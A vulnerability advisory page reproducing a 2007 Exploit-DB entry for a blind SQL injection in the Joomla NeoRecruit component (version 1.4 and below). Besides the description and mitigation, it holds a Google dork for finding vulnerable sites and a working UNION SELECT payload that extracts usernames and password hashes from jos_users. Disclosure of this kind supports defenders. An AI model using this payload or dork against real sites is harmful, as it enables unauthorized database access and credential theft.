Joomla Component NeoRecruit

vendor:

NeoRecruit

by:

ajann

7.5

CVSS

HIGH

Remote Blind SQL Injection

CWE

Product Name: NeoRecruit

Affected Version From: 1

Affected Version To: 1.4

Patch Exists: NO

Related CWE:

CPE: a:neojoomla:neorecruit:1.4

Metasploit:

Other Scripts:

Platforms Tested:

2007

Joomla Component NeoRecruit <= 1.4 (id) Remote Blind SQL Injection Vulnerability

The Joomla Component NeoRecruit version 1.4 and below is vulnerable to a remote blind SQL injection vulnerability. An attacker can exploit this vulnerability by injecting SQL code into the 'id' parameter of the 'offer_view' task in the 'com_neorecruit' component. This can lead to unauthorized access to the database, potentially exposing sensitive information.

Mitigation:

The vendor has not provided a patch for this vulnerability. To mitigate this issue, it is recommended to remove or disable the vulnerable component from the Joomla installation.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Joomla Component NeoRecruit <= 1.4 (id) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.neojoomla.com/
# $$      :  54,90 â‚¬
# Dork    :  inurl:index.php?option=com_NeoRecruit
# DorkEx  :
http://www.google.com.tr/search?hl=tr&q=inurl%3A%22index.php%3Foption%3Dcom_ponygallery%22&btnG=Ara&meta=lr%3D

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject]

Example:

//index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]